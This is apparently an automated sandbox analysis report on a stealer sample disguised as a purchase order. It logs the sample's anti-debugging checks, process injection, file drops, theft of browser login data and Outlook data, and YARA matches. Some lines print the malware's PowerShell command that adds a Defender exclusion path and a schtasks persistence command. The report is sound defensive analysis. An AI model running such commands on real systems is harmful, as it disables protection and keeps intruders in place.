                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DEEBE8 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02DEEBE8
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Process queried: DebugPort
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_052107C8 LdrInitializeThunk,LdrInitializeThunk,6_2_052107C8
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_004019F0 OleInitialize,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,SizeofResource,FreeResource,SizeofResource,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9,4_1_004019F0
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE8798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02DE8798
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_0040ADB0 GetProcessHeap,HeapFree,4_1_0040ADB0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Process token adjusted: Debug
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Process token adjusted: Debug
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_0040E61C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040E61C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00416F6A SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_00416F6A
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_004123F1 SetUnhandledExceptionFilter,4_1_004123F1
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_0040E61C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0040E61C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_00416F6A SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00416F6A
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_004123F1 SetUnhandledExceptionFilter,15_2_004123F1
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_1_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_0040E61C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_1_0040E61C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_00416F6A SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_1_00416F6A
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_004123F1 SetUnhandledExceptionFilter,15_1_004123F1
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 19_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 19_2_0040E61C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0040E61C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 19_2_00416F6A SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00416F6A
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 19_2_004123F1 SetUnhandledExceptionFilter,19_2_004123F1
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 19_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_1_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 19_1_0040E61C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_1_0040E61C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 19_1_00416F6A SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_1_00416F6A
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 19_1_004123F1 SetUnhandledExceptionFilter,19_1_004123F1
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Memory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: Microsofts.exe.4.dr, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                          Source: Microsofts.exe.4.dr, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                          Source: Microsofts.exe.4.dr, UltraSpeed.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Memory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Section unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 39A008
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 241008
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 200008
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02DD5A78
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: GetLocaleInfoA,0_2_02DDA790
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: GetLocaleInfoA,0_2_02DDA744
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02DD5B84
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: GetLocaleInfoA,4_1_00417A20
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_02E15A78
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: GetLocaleInfoA,12_2_02E1A790
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_02E15B83
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: GetLocaleInfoA,15_2_00417A20
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: GetLocaleInfoA,15_1_00417A20
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02E25A78
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: GetLocaleInfoA,16_2_02E2A790
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02E25B83
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: GetLocaleInfoA,19_2_00417A20
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: GetLocaleInfoA,19_1_00417A20
                          Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DD918C GetLocalTime,0_2_02DD918C
                          Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DDB70C GetVersionExA,0_2_02DDB70C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                          Stealing of Sensitive Information

                          Source: Yara match | File source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.335e0000.11.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.30783f56.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.32f70000.9.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.2da40f08.3.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.31996478.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.2da40000.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.2d5d3f56.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.319d3d90.7.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.2ea96478.9.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.31995570.6.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.30784e5e.1.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.31996478.8.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.30783f56.2.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.3.rpkhzpuO.pif.2e8737c8.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.2ead3d90.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.2ead3d90.10.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.32f70f08.10.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.304e0000.11.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.30784e5e.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.32f70000.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 4.3.rpkhzpuO.pif.2761c6f8.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.2ea95570.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.335e0000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.3.rpkhzpuO.pif.2e8737c8.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.32f70f08.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.2ea95570.8.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.304e0000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.319d3d90.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.rpkhzpuO.pif.31995570.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.3.rpkhzpuO.pif.2b733e10.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 15.2.rpkhzpuO.pif.2d5d3f56.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2da40000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2ea96478.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.2.rpkhzpuO.pif.2da40f08.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000003.23062543754.000000002B733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.23190771291.0000000032F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.23191645092.00000000335E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23114375641.000000002EA95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23111776153.000000002D593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000003.23143070311.000000002E873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.23190455309.0000000031995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.23115572603.00000000304E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: Yara matchFile source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000002.24180228176.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                          Remote Access Functionality

Source: Yara match | File source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.335e0000.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.30783f56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.32f70000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2da40f08.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.31996478.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2da40000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rpkhzpuO.pif.2d5d3f56.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rpkhzpuO.pif.319d3d90.7.unpack, type: UNPACKEDPE
